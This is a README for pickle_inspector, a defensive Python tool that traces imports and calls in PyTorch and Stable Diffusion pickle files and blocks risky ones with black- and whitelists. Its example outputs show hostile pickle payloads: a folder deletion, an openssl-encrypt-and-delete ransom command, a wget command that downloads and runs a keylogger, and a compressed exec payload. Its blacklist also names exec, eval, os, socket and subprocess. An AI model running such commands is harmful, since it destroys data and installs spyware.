pickle_inspector 🥒🔬

Check what is in the pickle before eating it.

About
Command line usage
Library usage
Controlled unpickling
Black- and whitelists
Acknowledgements

About

Trace the calls and imports that would occur if a pickle were loaded
Flat but detailed call graphs
Load malicious pickles by skipping blacklisted items
Library and script usage
Combination of black- and whitelists for fine-grained control
Can be used with PyTorch's load function (torch.load)

It works on any type of pickle, but was made with torch in mind.

NOTE: torch 1.13.0 breaks custom unpicklers, see pytorch/pytorch#88438.
This is fixed in torch 1.13.1 and 2.x.
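
The tracing described above can be pictured with Python's standard pickle module: every global a pickle references passes through Unpickler.find_class, so a subclass can record the name and hand back an inert stub instead of importing anything. The following is a minimal sketch of that idea and not pickle_inspector's actual code. TracingUnpickler and Payload are hypothetical names, and the stub is only rich enough for this toy payload.

```python
import io
import pickle
import shutil


class TracingUnpickler(pickle.Unpickler):
    """Hypothetical tracer: records requested globals, imports none of them."""

    def __init__(self, file):
        super().__init__(file)
        self.imports = []

    def find_class(self, module, name):
        # Called for every global the pickle references.
        self.imports.append(f"{module}.{name}")

        def stub(*args, **kwargs):
            # Stand-in that swallows the call instead of running it.
            return None

        return stub


class Payload:
    """Toy malicious object: a normal load would call shutil.rmtree."""

    def __reduce__(self):
        return (shutil.rmtree, ("/very/important/folder",))


data = pickle.dumps(Payload())
tracer = TracingUnpickler(io.BytesIO(data))
tracer.load()  # nothing is deleted, the stub absorbs the call
print(tracer.imports)
```

Real checkpoints also set state and items on the objects they build, so a practical stub would need to tolerate those operations as well.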

Scanning pickles via command line

tl;dr: just let me scan my pickles.

Using a preset blacklist for arbitrary code execution:

python scan_pickle.py -f exec -i pickled.pkl

> Using blacklist: exec
> Scanning file(s): ['pickled.pkl']
> Using black list: ['__builtin__.breakpoint', '__builtin__.open', 'requests.*', 'builtins.open', '__builtin__.compile', 'socket.*', 'builtins.breakpoint', 'os.*', 'nt.*', 'builtins.eval', 'webbrowser.*', '__builtin__.eval', 'builtins.exec', 'posix.*', '__builtin__.exec', '__builtin__.getattr', 'builtins.getattrsubprocess.*', 'builtins.compile', 'aiohttp.*', 'httplib.*', 'sys.*']
> Reading pickled.pkl
> Scanning: pickled.pkl
> found: __builtin__.exec
> found: zlib.decompress
>
> Found blacklisted items:
>
>   __builtin__.exec.__call__((zlib.decompress((b'x\xda5\xcd]\n\xc3 \x10\x04\xe0\xf7\x9cb\xd9\x17\x15$\x07\x08x\x87\xde@$\xac\xe9R\xff\xd0\r\t\x94\xde\xbdB\xe9<}\x0c\x0c\x13{\xcd\x90\xcf$\xdcz\xddi\x0c.\x07pn\xb5\x0b<~\xcd\xd2\xc0\xfd\xad%\xf4\x83\xc4\xd1M\xbb\x85\xe9\xe14"^,O\xa8\x8d\x8aV\xa9\xa6UnQ\x16\xd4\xa5\x0c\x84\x01q[`\xa6u.\xa21\x9e\xfb\x0b-DN\xe4\xa2\x99[\xfbF\xefK\xc8\xe4=n\x939p\x99\xfcX0fi\xeb\x98\x8f\xa2\xcd\x17\x1d%6\xbc',), {}),), {})
>
> Scan for pickled.pkl FAILED ⚠️

Using a preset whitelist for a Stable Diffusion checkpoint:

python scan_pickle.py --preset stable_diffusion_v1 --in sus.ckpt

> Using whitelist: stable_diffusion_v1
> Scanning file(s): ['sus.ckpt']
> Using white list: ['collections.OrderedDict', 'torch._utils._rebuild_tensor_v2', 'torch.HalfStorage', 'torch.FloatStorage', 'torch.IntStorage', 'torch.LongStorage', 'pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint', 'numpy.core.multiarray.scalar', 'numpy.dtype', '_codecs.encode']
> Reading sus.ckpt
> Found pickle in zip: archive/data.pkl
> Scanning: archive/data.pkl
> found: torch._utils._rebuild_tensor_v2
> found: torch.FloatStorage
> found: collections.OrderedDict
> found: torch.IntStorage
> found: torch.LongStorage
> found: pytorch_lightning.callbacks.model_checkpoint.ModelCheckpoint
> found: numpy.core.multiarray.scalar
> found: numpy.dtype
> found: _codecs.encode
>
> Scan for sus.ckpt PASSED ✅
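
The "Found pickle in zip" step can be approximated with the standard library alone. The sketch below is an assumption about one way to do it, not how scan_pickle.py is implemented: it swaps in static disassembly via pickletools.genops rather than a custom unpickler, and the helper names list_globals and scan_zip are hypothetical. Its handling of STACK_GLOBAL is a heuristic that can miss names fetched from the pickle memo, so treat it as a first look rather than a guarantee.

```python
import io
import pickle
import pickletools
import zipfile
from collections import OrderedDict

# Opcodes that push a text string, which STACK_GLOBAL later consumes.
STRING_OPCODES = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def list_globals(data):
    """Heuristically list 'module.name' references in raw pickle bytes."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # genops reports the argument as "module name".
            found.append(arg.replace(" ", ".", 1))
        elif opcode.name in STRING_OPCODES:
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Assumes module and name were the two most recent strings.
            found.append(".".join(strings[-2:]))
    return found


def scan_zip(file):
    """Map each *.pkl member of a zip archive to the globals it references."""
    with zipfile.ZipFile(file) as archive:
        return {
            member: list_globals(archive.read(member))
            for member in archive.namelist()
            if member.endswith(".pkl")
        }


# Build a tiny in-memory archive laid out like the checkpoint above.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("archive/data.pkl", pickle.dumps(OrderedDict(a=1), protocol=2))
buffer.seek(0)
print(scan_zip(buffer))
```

Nothing is unpickled here, so no code from the file can run during the scan.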

Script usage

usage: scan_pickle.py [-h] -i INPUT [INPUT ...]
                      [-p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]]
                      [-f {exec} [{exec} ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]]

Scan pickles

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT [INPUT ...], --in INPUT [INPUT ...]
                        path to a pickle(s) or zip(s) containing pickles
  -p {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...], --preset {stable_diffusion_v1,stable_diffusion_v2} [{stable_diffusion_v1,stable_diffusion_v2} ...]
                        a whitelist preset to use
  -f {exec} [{exec} ...], --preset_blacklist {exec} [{exec} ...]
                        a blacklist preset to use
  -w WHITELIST [WHITELIST ...], --whitelist WHITELIST [WHITELIST ...]
                        whitelist of modules and functions to allow
  -b BLACKLIST [BLACKLIST ...], --blacklist BLACKLIST [BLACKLIST ...]
                        blacklist of modules and functions to block

Inspecting

Inspect without unpickling.

import torch
import pickle_inspector
result = torch.load('sus.pt', pickle_module=pickle_inspector.inspector)
for c in result.imports:
    print(c)

Look for imports of shutil.rmtree, os.system or similar:

> shutil.rmtree
> torch._utils._rebuild_tensor_v2
> collections.OrderedDict
> numpy.core.multiarray.scalar
> os.system
> numpy.dtype
> _codecs.encode

So we take a closer look at what is being called:

for c in result.calls:
    print(c)

It looks like someone tried to delete a folder and hold a file for ransom:

> shutil.rmtree(('/very/important/folder'), {})
> collections.OrderedDict((), {})
> torch._utils._rebuild_tensor_v2((None, 0, (1000,), (1,), False, collections.OrderedDict((), {})), {})
...
> torch._utils._rebuild_tensor_v2((None, 0, (), (), False, collections.OrderedDict((), {})), {})
> os.system(('openssl enc -aes-128-ecb -in important_file -out give_money.enc -K 1337B00B135DEADBEEF; rm important_file'), {})
> numpy.dtype(('f8', False, True), {})
> numpy.dtype.__setstate__(((3, '<', None, None, None, -1, -1, 0),), {})
> _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})
> numpy.core.multiarray.scalar((numpy.dtype(('f8', False, True), {}), _codecs.encode(('ñhã\x88µøÔ>', 'latin1'), {})), {})
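
A nested call listing like the one above can be produced by stubs that log their own invocation and return a printable record. This is a sketch under assumptions, not the library's implementation: RecordedCall, CallRecorder, Inner and Outer are hypothetical names, and the printed format only approximates the output shown above.

```python
import io
import pickle
import shutil
import tempfile


class RecordedCall:
    """Result of a stubbed call; its repr shows the name and arguments."""

    def __init__(self, name, args, kwargs):
        self.name, self.args, self.kwargs = name, args, kwargs

    def __repr__(self):
        return f"{self.name}({self.args!r}, {self.kwargs!r})"


class CallRecorder(pickle.Unpickler):
    """Hypothetical recorder: replaces every global with a logging stub."""

    def __init__(self, file):
        super().__init__(file)
        self.calls = []

    def find_class(self, module, name):
        full_name = f"{module}.{name}"

        def stub(*args, **kwargs):
            # Log the call and return the record so outer calls can nest it.
            call = RecordedCall(full_name, args, kwargs)
            self.calls.append(call)
            return call

        return stub


class Inner:
    def __reduce__(self):
        return (tempfile.gettempdir, ())


class Outer:
    """Toy payload: a normal load would delete the temp directory."""

    def __reduce__(self):
        return (shutil.rmtree, (Inner(),))


recorder = CallRecorder(io.BytesIO(pickle.dumps(Outer())))
recorder.load()  # only stubs run, nothing is deleted
for call in recorder.calls:
    print(call)
```

Because each stub returns its record, the argument tuple of an outer call shows the inner call in place, which is what makes the flat list readable as a call graph.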

Controlled unpickling

Inspect and unpickle using white- and blacklists.

import torch
from pickle_inspector import UnpickleConfig, UnpickleControlled, PickleModule
config = UnpickleConfig()
# only allow modules, classes and functions in the whitelist
# everything else will be stubbed
config.whitelist = [
        'torch._utils._rebuild_tensor_v2',
        'torch.FloatStorage',
        'torch.IntStorage',
        'torch.LongStorage',
        'numpy.core.multiarray.scalar',
        'numpy.dtype',
        'collections.OrderedDict',
        '_codecs.encode'
]
result = torch.load('model.ckpt', pickle_module = PickleModule(UnpickleControlled, config))

# Use the state_dict as usual
state_dict = result.structure
# ...

# print import results
for c in result.imports:
    print(c)

> torch._utils._rebuild_tensor_v2
> torch.FloatStorage
...
> __builtin__.eval
> collections.OrderedDict
...

for c in result.calls:
    if 'eval' in c:
        print(c)

> __builtin__.eval('import os;os.system("wget https://sus.to/keylog;chmod +x keylog;./keylog &")')

Blacklist & Whitelist

Whitelist only: everything will be blocked except items in the whitelist
Blacklist only: everything will be allowed except items in the blacklist
Both black- and whitelist: everything in the blacklist will be blocked except items in the whitelist

Example: Block everything within torch except torch.FloatStorage

from pickle_inspector import UnpickleConfig
conf = UnpickleConfig()
conf.blacklist = ['torch.*']
conf.whitelist = ['torch.FloatStorage']
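
The three rules can be written down as a small decision function. This is a sketch of the semantics as stated in this section, not the library's code: is_allowed and matches are hypothetical helpers, treating entries such as 'torch.*' as glob patterns via fnmatch is an assumption, and so is allowing everything when both lists are empty.

```python
from fnmatch import fnmatchcase


def matches(name, patterns):
    """True if name matches any pattern; '*' is treated as a wildcard."""
    return any(fnmatchcase(name, pattern) for pattern in patterns)


def is_allowed(name, whitelist=(), blacklist=()):
    """Apply the three list rules to a dotted name such as 'torch.load'."""
    if matches(name, whitelist):
        return True  # a whitelist entry always wins
    if blacklist:
        # Blacklist only, or both lists: block only what the blacklist names.
        return not matches(name, blacklist)
    # Whitelist only: block the rest. No lists at all: allow (an assumption).
    return not whitelist


print(is_allowed("torch.FloatStorage", ["torch.FloatStorage"], ["torch.*"]))
print(is_allowed("torch.load", ["torch.FloatStorage"], ["torch.*"]))
```

With the example lists, torch.FloatStorage is allowed and every other torch name is blocked, while names outside torch pass because the blacklist does not cover them.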

Whitelist for stable diffusion

Premade whitelists for Stable Diffusion v1 and v2 are available in this project.

Example: Scan a Stable Diffusion v1 checkpoint

import torch
from pickle_inspector import UnpickleConfig, PickleModule, UnpickleInspector, importlists
conf = UnpickleConfig(whitelist = importlists.stable_diffusion_v1)
torch.load('sd-v1-4.ckpt', pickle_module=PickleModule(UnpickleInspector, conf))

Tested with Python 3.9 and torch 1.12.1.

Acknowledgements

pickle_injector, in which coldwaterq describes an easy way to inject malicious code into pickle files
picklescan by mmaitre314, an alternative approach to pickle scanning

Copyright (C) 2023 Lopho <[email protected]>
Licensed under the AGPLv3 <https://www.gnu.org/licenses/agpl-3.0.html>
